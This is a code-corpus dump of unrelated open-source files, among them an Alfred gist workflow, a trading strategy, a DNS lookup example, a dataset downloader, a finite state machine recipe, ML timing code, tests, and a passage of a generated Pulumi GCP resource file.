max_stars_repo_path
stringlengths
4
245
max_stars_repo_name
stringlengths
7
115
max_stars_count
int64
101
368k
id
stringlengths
2
8
content
stringlengths
6
1.03M
gist_set.py
devnoname120/gist-alfred
113
29515
#!/usr/bin/python # encoding: utf-8 from collections import Counter from gist import create_workflow from pprint import pprint as pp import sys import workflow from workflow import Workflow, web from workflow.background import run_in_background, is_running def main(wf): arg = wf.args[0] wf.add_item(u"Set token", arg=arg, valid=True, icon="icons/token.png") wf.send_feedback() if __name__ == '__main__': wf = create_workflow() sys.exit(wf.run(main))
class_12/strategies/fixed_trade_price_strategy.py
taoranalex/course_codes
121
29516
<filename>class_12/strategies/fixed_trade_price_strategy.py from howtrader.app.cta_strategy import ( CtaTemplate, StopOrder, TickData, BarData, TradeData, OrderData, BarGenerator, ArrayManager ) from howtrader.trader.constant import Interval from datetime import datetime from howtrader.app.cta_strategy.engine import CtaEngine, EngineType import pandas_ta as ta import pandas as pd class FixedTradPriceStrategy(CtaTemplate): """ 基于价格的定投 """ author = "51bitquant" fixed_trade_money = 1000 # 每次定投的资金比例. price_change_pct = 0.05 # 价格变动多少的时候定投 parameters = ['fixed_trade_money', 'price_change_pct'] def __init__(self, cta_engine: CtaEngine, strategy_name, vt_symbol, setting): """""" super().__init__(cta_engine, strategy_name, vt_symbol, setting) self.bg_4hour = BarGenerator(self.on_bar, 4, self.on_4hour_bar, Interval.HOUR) self.am = ArrayManager(size=100) # 时间序列,类似我们用的pandas, 值保留最近的N个K线的数据. def on_init(self): """ Callback when strategy is inited. """ self.write_log("策略初始化") self.load_bar(1) # 具体加载多少天的数据, 1表示1天的数据,如果是2表示过去2天的数据 def on_start(self): """ Callback when strategy is started. """ self.write_log(f"我的策略启动") self.put_event() def on_stop(self): """ Callback when strategy is stopped. """ self.write_log("策略停止") self.put_event() def on_tick(self, tick: TickData): pass def on_bar(self, bar: BarData): """ Callback of new bar data update. """ self.bg_4hour.update_bar(bar) # 合成四小时的数据. self.put_event() def on_4hour_bar(self, bar: BarData): """ 四小时的K线数据. """ self.cancel_all() # 撤销所有订单. self.am.update_bar(bar) # 把最新的K线放进时间序列里面. # 下面可以计算基数指标等等.... # 以及下单的事情. if not self.am.inited: return # [0,1,2,3,4,5,6] last_close_price = self.am.close_array[-2] # 上一根K线 current_close_price = bar.close_price # self.am.close_array[-1] # 当前的收盘价 # 如果四小时价格下跌5%就买入. if (last_close_price - current_close_price)/last_close_price >= self.price_change_pct: price = bar.close_price * 1.001 self.buy(price, self.fixed_trade_money/price) self.put_event() def on_order(self, order: OrderData): """ 订单的回调方法: 订单状态更新的时候,会调用这个方法。 """ self.put_event() def on_trade(self, trade: TradeData): """ """ self.put_event() # 更新UI界面方法。 def on_stop_order(self, stop_order: StopOrder): """ 这个是一个停止单的方法,用来监听你止损单的方法。 """ pass
external/unbound/libunbound/python/examples/async-lookup.py
simplixcurrency/simplix
1,751
29530
<reponame>simplixcurrency/simplix #!/usr/bin/python ''' async-lookup.py : This example shows how to use asynchronous lookups Authors: <NAME> (vasicek AT fit.vutbr.cz) <NAME> (xvavru00 AT stud.fit.vutbr.cz) Copyright (c) 2008. All rights reserved. This software is open source. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' from __future__ import print_function import unbound import time ctx = unbound.ub_ctx() ctx.resolvconf("/etc/resolv.conf") def call_back(my_data,status,result): print("Call_back:", sorted(my_data)) if status == 0 and result.havedata: print("Result:", sorted(result.data.address_list)) my_data['done_flag'] = True my_data = {'done_flag':False,'arbitrary':"object"} status, async_id = ctx.resolve_async("www.nic.cz", my_data, call_back, unbound.RR_TYPE_A, unbound.RR_CLASS_IN) while (status == 0) and (not my_data['done_flag']): status = ctx.process() time.sleep(0.1) if (status != 0): print("Resolve error:", unbound.ub_strerror(status))
dataloader/Dataset.py
mvemoon/TextClassificationBenchmark
576
29568
# -*- coding: utf-8 -*- import os,urllib class Dataset(object): def __init__(self,opt=None): if opt is not None: self.setup(opt) self.http_proxy= opt.__dict__.get("proxy","null") else: self.name="demo" self.dirname="demo" self.http_proxy="null" self.urls=[] self.root=".data" self.saved_path= os.path.join(os.path.join(self.root,"clean"),self.name) self.formated_files=None def setup(self,opt): self.name=opt.dataset self.dirname=opt.dataset self.http_proxy= opt.__dict__.get("proxy","null") def process(self): dirname=self.download() print("processing dirname: "+ dirname) raise Exception("method in father class have been called in processing: {} dataset".format(opt.dataset)) return dirname def getFormatedData(self): if self.formated_files is not None: return self.formated_files if os.path.exists(self.saved_path): return [os.path.join(self.saved_path,filename) for filename in os.listdir(self.saved_path)] self.formated_files = self.process() return self.formated_files def download_from_url(self,url, path, schedule=None): #if schedule is None: # schedule=lambda a,b,c : print("%.1f"%(100.0 * a * b / c), end='\r',flush=True) if (int(a * b / c)*100)%10==0 else None if self.http_proxy != "null": proxy = urllib.request.ProxyHandler({'http': self.http_proxy,'https': self.http_proxy}) # construct a new opener using your proxy settings opener = urllib.request.build_opener(proxy) # install the openen on the module-level urllib.request.install_opener(opener) print("proxy in %s" % self.http_proxy) # urllib.request.urlretrieve(url,path,lambda a,b,c : print("%.1f"%(100.0 * a * b / c), end='\r',flush=True) if (int(a * b / c)*1000)%100==0 else None )a try: urllib.request.urlretrieve(url,path ) except: import urllib2 urllib2.urlretrieve(url,path ) return path def download(self,check=None): """Download and unzip an online archive (.zip, .gz, or .tgz). Arguments: check (str or None): Folder whose existence indicates that the dataset has already been downloaded, or None to check the existence of root/{cls.name}. Returns: dataset_path (str): Path to extracted dataset. """ import zipfile,tarfile path = os.path.join(self.root, self.name) check = path if check is None else check if not os.path.isdir(check): for url in self.urls: if isinstance(url, tuple): url, filename = url else: filename = os.path.basename(url) zpath = os.path.join(path, filename) if not os.path.isfile(zpath): if not os.path.exists(os.path.dirname(zpath)): os.makedirs(os.path.dirname(zpath)) print('downloading {}'.format(filename)) self.download_from_url(url, zpath) ext = os.path.splitext(filename)[-1] if ext == '.zip': with zipfile.ZipFile(zpath, 'r') as zfile: print('extracting') zfile.extractall(path) elif ext in ['.gz', '.tgz',".bz2"]: with tarfile.open(zpath, 'r:gz') as tar: dirs = [member for member in tar.getmembers()] tar.extractall(path=path, members=dirs) else: print("%s do not need to be downloaded" % path) return path
recipes/Python/578344_Simple_Finite_State_Machine_class_/recipe-578344.py
tdiprima/code
2,023
29633
#! /usr/bin/env python """ Generic finite state machine class Initialise the class with a list of tuples - or by adding transitions <NAME> - November 2012 Released under an MIT License - free to use so long as the author and other contributers are credited. """ class fsm(object): """ A simple to use finite state machine class. Allows definition of multiple states, condition functions from state to state and optional callbacks """ def __init__(self, states=[]): self._states=states self.currentState = None def start(self,startState=None): """ Start the finite state machine """ if not startState or not (startState in [x[0] for x in self._states]): raise ValueError("Not a valid start state") self.currentState = startState def stop(self): """ Stop the finite state machine """ # Bug fix 15 Dec 2012 - self.currentState should be reset, not startState - Identified by <NAME> self.currentState = None def addTransition(self,fromState, toState, condition, callback=None): """ Add a state transition to the list, order is irellevant, loops are undetected Can only add a transition if the state machine isn't started. """ if not self.currentState: raise ValueError("StateMachine already Started - cannot add new transitions") # add a transition to the state table self._states.append( (fromState, toState,condition, callback)) def event(self, value): """ Trigger a transition - return a tuple (<new_state>, <changed>) Raise an exception if no valid transition exists. Callee needs to determine if the value will be consumed or re-used """ if not self.currentState: raise ValueError("StateMachine not Started - cannot process event") # get a list of transitions which are valid self.nextStates = [ x for x in self._states\ if x[0] == self.currentState \ and (x[2]==True or (callable(x[2]) and x[2](value))) ] if not self.nextStates: raise ValueError("No Transition defined from state {0} with value '{1}'".format(self.currentState, value)) elif len(self.nextStates) > 1: raise ValueError("Ambiguous transitions from state {0} with value '{1}' -> New states defined {2}".format(self.currentState, value, [x[0] for x in self.nextStates])) else: if len(self.nextStates[0]) == 4: current, next, condition, callback = self.nextStates[0] else: current, next, condition = self.nextStates[0] callback = None self.currentState, changed = (next,True) \ if self.currentState != next else (next, False) # Execute the callback if defined if callable(callback): callback(self, value) return self.currentState, changed def CurrentState(self): """ Return the current State of the finite State machine """ return self.currentState # ------------------------------------------------------------------------------------------------- # Example classes to demonstrate the use of the Finite State Machine Class # They implement a simple lexical tokeniser. # These classes are not neccesary for the FSM class to work. # ------------------------------------------------------------------------------------------------- # Simple storage object for each token class token(object): def __init__(self, type): self.tokenType = type self.tokenText = "" def addCharacter(self, char): self.tokenText += char def __repr__(self): return "{0}<{1}>".format(self.tokenType, self.tokenText) # Token list object - demonstrating the definition of state machine callbacks class tokenList(object): def __init__(self): self.tokenList = [] self.currentToken = None def StartToken(self, fss, value): self.currentToken = token(fss.CurrentState()) self.currentToken.addCharacter(value) def addCharacter(self, fss, value): self.currentToken.addCharacter(value) def EndToken(self, fss, value): self.tokenList.append(self.currentToken) self.currentToken = None # Example code - showing population of the state machine in the constructor # the Machine could also be constructed by multiple calls to addTransition method # Example code is a simple tokeniser # Machine transitions back to the Start state whenever the end of a token is detected if __name__ == "__main__": t = tokenList() fs = fsm( [ ("Start","Start",lambda x: x.isspace() ), ("Start","Identifier",str.isalpha, t.StartToken ), ("Identifier","Identifier", str.isalnum, t.addCharacter ), ("Identifier","Start",lambda x: not x.isalnum(), t.EndToken ), ("Start","Operator", lambda x: x in "=+*/-()", t.StartToken ), ("Operator","Start", True, t.EndToken), ("Start","Number",str.isdigit, t.StartToken ), ("Number","Number",lambda x: x.isdigit() or x == ".", t.addCharacter ), ("Number","Start",lambda x: not x.isdigit() and x != ".", t.EndToken ), ("Start","StartQuote",lambda x: x == "\'"), ("StartQuote","String", lambda x: x != "\'", t.StartToken), ("String","String",lambda x: x != "\'", t.addCharacter ), ("String","EndQuote", lambda x: x == "\'", t.EndToken ), ("EndQuote","Start", True ) ] ) fs.start("Start") a = " x123=MyString+123.65-'hello'*value" c = 0 while c < len(a): ret = fs.event(a[c]) # Make sure a transition back to start (from something else) does not consume the character. if ret[0] != "Start" or (ret[0] == "Start" and ret[1] == False): c += 1 ret = fs.event("") print t.tokenList
src/main/python/counts_tools/exec/deviation_analysis.py
cday97/beam
123
29642
import ConfigParser from datetime import datetime import os import sys import numpy as np import pandas as pd import utils.counts import utils.counts_deviation __author__ = '<NAME>' # This script finds the days with the greatest deviation from some reference value (such as hourly means or medians) if __name__ == '__main__': if len(sys.argv) < 2: print 'ERROR: need to supply the path to the conifg file' config_path = sys.argv[1] conf = ConfigParser.ConfigParser() conf.read(config_path) # Paths station_TS_dir = conf.get('Paths', 'station_TS_dir') # Path to station Time Series ref_counts_file = conf.get('Paths', 'ref_counts_file') out_file = conf.get('Paths', 'out_file') # Where to write the counts file # Parameters start_date = conf.get('Params', 'start_date') end_date = conf.get('Params', 'end_date') days = [int(d.strip()) for d in conf.get('Params', 'days').split(',')] measure = conf.get('Params', 'measure') # Get target dates targ_dates = utils.counts.date_string_list(start_date, end_date, days) # Create the counts file ref = utils.counts.df_from_counts(ref_counts_file) # DF w/ mean flow for each link measures = [] keepers = [] for i, stat in enumerate(ref.columns): # Get path to stat ts file print 'Processings station: %s' % str(stat) print 'Number %d of %d' % (i, ref.shape[1]) ts_path = os.path.join(station_TS_dir, str(stat), 'time_series.csv') c_dev = utils.counts_deviation.CountsDeviation(ts_path, targ_dates) if c_dev.missing: # if there is missing data, we skip the whole station print "Missing data. Skipping station: %s" % str(stat) continue c_dev.calc_measure(measure, reference=ref[stat]) measures.append(c_dev.measures[measure]) keepers.append(stat) df = pd.DataFrame(measures).transpose() df.columns = keepers df.index = targ_dates df.dropna(axis=1) df['Max_Dev'] = df.apply(np.sum, axis=1) df.to_csv(out_file)
boltstream/responses.py
geekpii/boltstream
1,735
29643
from django.http import HttpResponse class HttpResponseNoContent(HttpResponse): status_code = 204
res/TensorFlowPythonExamples/examples/while/__init__.py
bogus-sudo/ONE-1
255
29648
import tensorflow as tf i = tf.compat.v1.constant(0, name="Hole") c = lambda i: tf.compat.v1.less(i, 10) b = lambda i: tf.compat.v1.add(i, 1) r = tf.compat.v1.while_loop(c, b, [i], name="While")
recipes/mio/all/conanfile.py
rockandsalt/conan-center-index
562
29654
<reponame>rockandsalt/conan-center-index from conans import ConanFile, tools import os required_conan_version = ">=1.33.0" class MioConan(ConanFile): name = "mio" description = "Cross-platform C++11 header-only library for memory mapped file IO." license = "MIT" topics = ("mio", "mmap", "memory-mapping", "fileviewer") homepage = "https://github.com/mandreyel/mio" url = "https://github.com/conan-io/conan-center-index" settings = "os", "compiler" exports_sources = "patches/**" @property def _source_subfolder(self): return "source_subfolder" def validate(self): if self.settings.compiler.get_safe("cppstd"): tools.check_min_cppstd(self, 11) def package_id(self): self.info.header_only() def source(self): tools.get(**self.conan_data["sources"][self.version], destination=self._source_subfolder, strip_root=True) def build(self): for patch in self.conan_data.get("patches", {}).get(self.version, []): tools.patch(**patch) def package(self): self.copy("LICENSE", dst="licenses", src=self._source_subfolder) self.copy("*pp", dst="include", src=os.path.join(self._source_subfolder, "include")) def package_info(self): self.cpp_info.names["cmake_find_package"] = "mio" self.cpp_info.names["cmake_find_package_multi"] = "mio" self.cpp_info.components["mio-headers"].names["cmake_find_package"] = "mio-headers" self.cpp_info.components["mio-headers"].names["cmake_find_package_multi"] = "mio-headers" if self.settings.os == "Windows": self.cpp_info.components["mio_full_winapi"].names["cmake_find_package"] = "mio_full_winapi" self.cpp_info.components["mio_full_winapi"].names["cmake_find_package_multi"] = "mio_full_winapi" self.cpp_info.components["mio_min_winapi"].names["cmake_find_package"] = "mio_min_winapi" self.cpp_info.components["mio_min_winapi"].names["cmake_find_package_multi"] = "mio_min_winapi" self.cpp_info.components["mio_min_winapi"].defines = ["WIN32_LEAN_AND_MEAN", "NOMINMAX"]
examples/titanic/assets/dataset/opener.py
eliaskousk/substra
119
29663
<reponame>eliaskousk/substra import os import pandas as pd import random import string import numpy as np import substratools as tools class TitanicOpener(tools.Opener): def get_X(self, folders): data = self._get_data(folders) return self._get_X(data) def get_y(self, folders): data = self._get_data(folders) return self._get_y(data) def save_predictions(self, y_pred, path): with open(path, 'w') as f: y_pred.to_csv(f, index=False) def get_predictions(self, path): return pd.read_csv(path) def fake_X(self, n_samples=None): data = self._fake_data(n_samples) return self._get_X(data) def fake_y(self, n_samples=None): data = self._fake_data(n_samples) return self._get_y(data) @classmethod def _get_X(cls, data): return data.drop(columns=['Survived']) @classmethod def _get_y(cls, data): return pd.DataFrame(data=data.get('Survived'), columns=['Survived']) @classmethod def _fake_data(cls, n_samples=None): N_SAMPLES = n_samples if n_samples and n_samples <= 100 else 100 data = { 'PassengerId': list(range(N_SAMPLES)), 'Survived': [random.choice([True, False]) for k in range(N_SAMPLES)], 'Pclass': [random.choice([1, 2, 3]) for k in range(N_SAMPLES)], 'Name': ["".join(random.sample(string.ascii_letters, 10)) for k in range(N_SAMPLES)], 'Sex': [random.choice(['male', 'female']) for k in range(N_SAMPLES)], 'Age': [random.choice(range(7, 77)) for k in range(N_SAMPLES)], 'SibSp': [random.choice(range(4)) for k in range(N_SAMPLES)], 'Parch': [random.choice(range(4)) for k in range(N_SAMPLES)], 'Ticket': ["".join(random.sample(string.ascii_letters, 10)) for k in range(N_SAMPLES)], 'Fare': [random.choice(np.arange(15, 150, 0.01)) for k in range(N_SAMPLES)], 'Cabin': ["".join(random.sample(string.ascii_letters, 3)) for k in range(N_SAMPLES)], 'Embarked': [random.choice(['C', 'S', 'Q']) for k in range(N_SAMPLES)], } return pd.DataFrame(data) @classmethod def _get_data(cls, folders): # find csv files paths = [] for folder in folders: paths += [os.path.join(folder, f) for f in os.listdir(folder) if f[-4:] == '.csv'] # load data data = pd.DataFrame() for path in paths: data = data.append(pd.read_csv(path)) return data
test/integration/test_natural_language_understanding_v1.py
jsstylos/waston-developer-cloud-python-sdk
1,579
29664
# coding: utf-8 from unittest import TestCase import os import ibm_watson import pytest import json import time from ibm_watson.natural_language_understanding_v1 import Features, EntitiesOptions, KeywordsOptions @pytest.mark.skipif(os.getenv('NATURAL_LANGUAGE_UNDERSTANDING_APIKEY') is None, reason='requires NATURAL_LANGUAGE_UNDERSTANDING_APIKEY') class TestNaturalLanguageUnderstandingV1(TestCase): def setUp(self): self.natural_language_understanding = ibm_watson.NaturalLanguageUnderstandingV1(version='2018-03-16') self.natural_language_understanding.set_default_headers({ 'X-Watson-Learning-Opt-Out': '1', 'X-Watson-Test': '1' }) def test_analyze(self): response = self.natural_language_understanding.analyze( text='Bruce Banner is the Hulk and Bruce Wayne is BATMAN! ' 'Superman fears not Banner, but Wayne.', features=Features(entities=EntitiesOptions(), keywords=KeywordsOptions())).get_result() assert response is not None
vit_jax/inference_time.py
fensence/Mixup-VT
4,825
29722
<reponame>fensence/Mixup-VT<gh_stars>1000+ # Copyright 2021 Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import functools import os import time from absl import logging from clu import metric_writers import flax import flax.jax_utils as flax_utils import jax import jax.numpy as jnp import ml_collections import numpy as np import tensorflow as tf from vit_jax import checkpoint from vit_jax import models from vit_jax.configs import models as config_lib def inference_time(config: ml_collections.ConfigDict, workdir: str): """Runs a number of steps and measures inference time.""" assert config.batch, f'Expected --config.batch={config.batch} > 0' assert config.num_classes, ( f'Expected --config.num_classes={config.num_classes} > 0') assert config.image_size, ( f'Expected --config.image_size={config.image_size} > 0') # Build VisionTransformer architecture model_config = config_lib.MODEL_CONFIGS[config.model_name] model = models.VisionTransformer( num_classes=config.num_classes, **model_config) # Make sure initial model parameters (before replication) are on CPU only. @functools.partial(jax.jit, backend='cpu') def init(rng): return model.init( rng, # Discard the "num_local_devices" dimension for initialization. inputs=jnp.ones([1, config.image_size, config.image_size, 3], jnp.float32), train=False) variables = init(jax.random.PRNGKey(0)) params_repl = flax_utils.replicate(variables['params']) # pmap replicates the models over all TPUs/GPUs vit_fn_repl = jax.pmap(functools.partial(model.apply, train=False)) images = jnp.ones([ jax.local_device_count(), config.batch // jax.local_device_count(), config.image_size, config.image_size, 3 ], jnp.float32) writer = metric_writers.create_default_writer(workdir, asynchronous=False) writer.write_hparams(config.to_dict()) logging.info('Starting training loop; initial compile can take a while...') logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images) logits.block_until_ready() logging.info('Done.') logging.info('Going to run %d inferences WITHOUT measuring...', config.initial_steps) for _ in range(config.initial_steps): logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images) logits.block_until_ready() logging.info('Going to run %d inferences measuring...', config.steps) times = [] for _ in range(config.initial_steps): t0 = time.time() logits = vit_fn_repl(flax.core.FrozenDict(params=params_repl), images) logits.block_until_ready() times.append(time.time() - t0) logging.info('times=%s', times) imgs_sec_core = config.batch / jax.local_device_count() / np.array(times) logging.info('imgs_sec_core_min=%f', imgs_sec_core.min()) logging.info('imgs_sec_core_max=%f', imgs_sec_core.max()) logging.info('imgs_sec_core_mean=%f', imgs_sec_core.mean()) logging.info('imgs_sec_core_std=%f', imgs_sec_core.std()) writer.write_scalars( 0, dict( imgs_sec_core_min=imgs_sec_core.min(), imgs_sec_core_max=imgs_sec_core.max(), imgs_sec_core_mean=imgs_sec_core.mean(), imgs_sec_core_std=imgs_sec_core.std(), ))
cloudmarker/test/test_azwebapphttp20event.py
TinLe/cloudmarker
208
29726
"""Tests for AzWebAppHttp20Event plugin.""" import copy import unittest from cloudmarker.events import azwebapphttp20event base_record = { 'ext': { 'record_type': 'web_app_config', 'cloud_type': 'azure', 'http20_enabled': True }, 'com': { 'cloud_type': 'azure' } } class AzWebAppHttp20EventTest(unittest.TestCase): """Tests for AzWebAppHttp20Event plugin.""" def test_com_bucket_missing(self): record = copy.deepcopy(base_record) record['com'] = None plugin = azwebapphttp20event.AzWebAppHttp20Event() events = list(plugin.eval(record)) self.assertEqual(events, []) def test_cloud_type_non_azure(self): record = copy.deepcopy(base_record) record['com']['cloud_type'] = 'non_azure' plugin = azwebapphttp20event.AzWebAppHttp20Event() events = list(plugin.eval(record)) self.assertEqual(events, []) def test_ext_bucket_missing(self): record = copy.deepcopy(base_record) record['ext'] = None plugin = azwebapphttp20event.AzWebAppHttp20Event() events = list(plugin.eval(record)) self.assertEqual(events, []) def test_record_type_non_web_app_config(self): record = copy.deepcopy(base_record) record['ext']['record_type'] = 'non_web_app_config' plugin = azwebapphttp20event.AzWebAppHttp20Event() events = list(plugin.eval(record)) self.assertEqual(events, []) def test_http20_enabled(self): record = copy.deepcopy(base_record) record['ext']['http20_enabled'] = True plugin = azwebapphttp20event.AzWebAppHttp20Event() events = list(plugin.eval(record)) self.assertEqual(events, []) def test_http20_disabled(self): record = copy.deepcopy(base_record) record['ext']['http20_enabled'] = False plugin = azwebapphttp20event.AzWebAppHttp20Event() events = list(plugin.eval(record)) self.assertEqual(len(events), 1) self.assertEqual(events[0]['ext']['record_type'], 'web_app_http20_event') self.assertEqual(events[0]['com']['record_type'], 'web_app_http20_event')
ranking/migrations/0056_auto_20201128_2316.py
horacexd/clist
166
29737
<gh_stars>100-1000 # Generated by Django 2.2.13 on 2020-11-28 23:16 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('ranking', '0055_auto_20201009_0735'), ] operations = [ migrations.AddIndex( model_name='statistics', index=models.Index(fields=['place_as_int', '-created'], name='ranking_sta_place_a_42252c_idx'), ), ]
examples/black_lives/create_progmem.py
fejiso/PxMatrix
599
29754
#!/usr/bin/python import binascii import sys import glob, os import pdb file_no=0; file_names=[]; RGB565=1; out_string=""; def printrgb565(red, green, blue): x1 = (red & 0xF8) | (green >> 5); x2 = ((green & 0x1C) << 3) | (blue >> 3); #pdb.set_trace() this_string="0x" + str(binascii.hexlify(chr(x2))) + ","; this_string+="0x" + str(binascii.hexlify(chr(x1))) + ","; return this_string; def printrgb888(red, green, blue): this_string="0x" + str(binascii.hexlify(red)) + ","; this_string+="0x" + str(binascii.hexlify(green)) + ","; this_string+="0x" + str(binascii.hexlify(blue)) + ","; return this_string; out_string="uint8_t animation_lengths[]={"; for file in glob.glob("*.rgb"): file_no=file_no+1; file_names.append(str(file)) size = os.path.getsize(str(file))/64/32/3 out_string+=str(size)+ ","; out_string=out_string[:-1]; out_string+="};\nconst uint8_t animations[] PROGMEM = {"; print (out_string) byte_count=0; for file_name in file_names: size = os.path.getsize(str(file_name)) print(str(file_name)+ "- source_size: " + str(size)); with open(file_name, 'rb') as f: byte0 = f.read(1) while byte0 != "": byte1 = f.read(1) byte2 = f.read(1) # Do stuff with byte. if (RGB565): out_string+=printrgb565(ord(byte0), ord(byte1), ord(byte2)) byte_count=byte_count+2; else: out_string+=printrgb888(byte0, byte1, byte2,out_string) byte_count=byte_count+3; if ((byte_count%10)==0): out_string+="\n"; byte0 = f.read(1) #print(str(file_name)+ "- out_size: " + str(byte_count)); out_string+="0x00};"; out_file = open("anim_data.h", "w"); out_file.write(out_string); out_file.close();
sdk/python/pulumi_gcp/iam/workload_identity_pool_provider.py
sisisin/pulumi-gcp
121
29762
<filename>sdk/python/pulumi_gcp/iam/workload_identity_pool_provider.py # coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities from . import outputs from ._inputs import * __all__ = ['WorkloadIdentityPoolProviderArgs', 'WorkloadIdentityPoolProvider'] @pulumi.input_type class WorkloadIdentityPoolProviderArgs: def __init__(__self__, *, workload_identity_pool_id: pulumi.Input[str], workload_identity_pool_provider_id: pulumi.Input[str], attribute_condition: Optional[pulumi.Input[str]] = None, attribute_mapping: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, aws: Optional[pulumi.Input['WorkloadIdentityPoolProviderAwsArgs']] = None, description: Optional[pulumi.Input[str]] = None, disabled: Optional[pulumi.Input[bool]] = None, display_name: Optional[pulumi.Input[str]] = None, oidc: Optional[pulumi.Input['WorkloadIdentityPoolProviderOidcArgs']] = None, project: Optional[pulumi.Input[str]] = None): """ The set of arguments for constructing a WorkloadIdentityPoolProvider resource. :param pulumi.Input[str] workload_identity_pool_id: The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] workload_identity_pool_provider_id: The ID for the provider, which becomes the final component of the resource name. This value must be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix `gcp-` is reserved for use by Google, and may not be specified. :param pulumi.Input[str] attribute_condition: [A Common Expression Language](https://opensource.google/projects/cel) expression, in plain text, to restrict what otherwise valid authentication credentials issued by the provider should not be accepted. The expression must output a boolean representing whether to allow the federation. The following keywords may be referenced in the expressions: * `assertion`: JSON representing the authentication credential issued by the provider. * `google`: The Google attributes mapped from the assertion in the `attribute_mappings`. * `attribute`: The custom attributes mapped from the assertion in the `attribute_mappings`. The maximum length of the attribute condition expression is 4096 characters. If unspecified, all valid authentication credential are accepted. The following example shows how to only allow credentials with a mapped `google.groups` value of `admins`: ```python import pulumi ``` :param pulumi.Input[Mapping[str, pulumi.Input[str]]] attribute_mapping: Maps attributes from authentication credentials issued by an external identity provider to Google Cloud attributes, such as `subject` and `segment`. Each key must be a string specifying the Google Cloud IAM attribute to map to. The following keys are supported: * `google.subject`: The principal IAM is authenticating. You can reference this value in IAM bindings. This is also the subject that appears in Cloud Logging logs. Cannot exceed 127 characters. * `google.groups`: Groups the external identity belongs to. You can grant groups access to resources using an IAM `principalSet` binding; access applies to all members of the group. You can also provide custom attributes by specifying `attribute.{custom_attribute}`, where `{custom_attribute}` is the name of the custom attribute to be mapped. You can define a maximum of 50 custom attributes. The maximum length of a mapped attribute key is 100 characters, and the key may only contain the characters [a-z0-9_]. You can reference these attributes in IAM policies to define fine-grained access for a workload to Google Cloud resources. For example: * `google.subject`: `principal://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/subject/{value}` * `google.groups`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/group/{value}` * `attribute.{custom_attribute}`: `principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` Each value must be a [Common Expression Language](https://opensource.google/projects/cel) function that maps an identity provider credential to the normalized attribute specified by the corresponding map key. You can use the `assertion` keyword in the expression to access a JSON representation of the authentication credential issued by the provider. The maximum length of an attribute mapping expression is 2048 characters. When evaluated, the total size of all mapped attributes must not exceed 8KB. For AWS providers, the following rules apply: - If no attribute mapping is defined, the following default mapping applies: ```python import pulumi ``` - If any custom attribute mappings are defined, they must include a mapping to the `google.subject` attribute. For OIDC providers, the following rules apply: - Custom attribute mappings must be defined, and must include a mapping to the `google.subject` attribute. For example, the following maps the `sub` claim of the incoming credential to the `subject` attribute on a Google token. ```python import pulumi ``` :param pulumi.Input['WorkloadIdentityPoolProviderAwsArgs'] aws: An Amazon Web Services identity provider. Not compatible with the property oidc. Structure is documented below. :param pulumi.Input[str] description: A description for the provider. Cannot exceed 256 characters. :param pulumi.Input[bool] disabled: Whether the provider is disabled. You cannot use a disabled provider to exchange tokens. However, existing tokens still grant access. :param pulumi.Input[str] display_name: A display name for the provider. Cannot exceed 32 characters. :param pulumi.Input['WorkloadIdentityPoolProviderOidcArgs'] oidc: An OpenId Connect 1.0 identity provider. Not compatible with the property aws. Structure is documented below. :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """ pulumi.set(__self__, "workload_identity_pool_id", workload_identity_pool_id) pulumi.set(__self__, "workload_identity_pool_provider_id", workload_identity_pool_provider_id) if attribute_condition is not None: pulumi.set(__self__, "attribute_condition", attribute_condition) if attribute_mapping is not None: pulumi.set(__self__, "attribute_mapping", attribute_mapping) if aws is not None: pulumi.set(__self__, "aws", aws) if description is not None: pulumi.set(__self__, "description", description) if disabled is not None: pulumi.set(__self__, "disabled", disabled) if display_name is not None: pulumi.set(__self__, "display_name", display_name) if oidc is not None: pulumi.set(__self__, "oidc", oidc) if project is not None: pulumi.set(__self__, "project", project) @property @pulumi.getter(name="workloadIdentityPoolId") def workload_identity_pool_id(self) -> pulumi.Input[str]: """ The ID used for the pool, which is the final component of the pool resource name. This value should be 4-32 characters, and may contain the characters [a-z0-9-]. The prefix 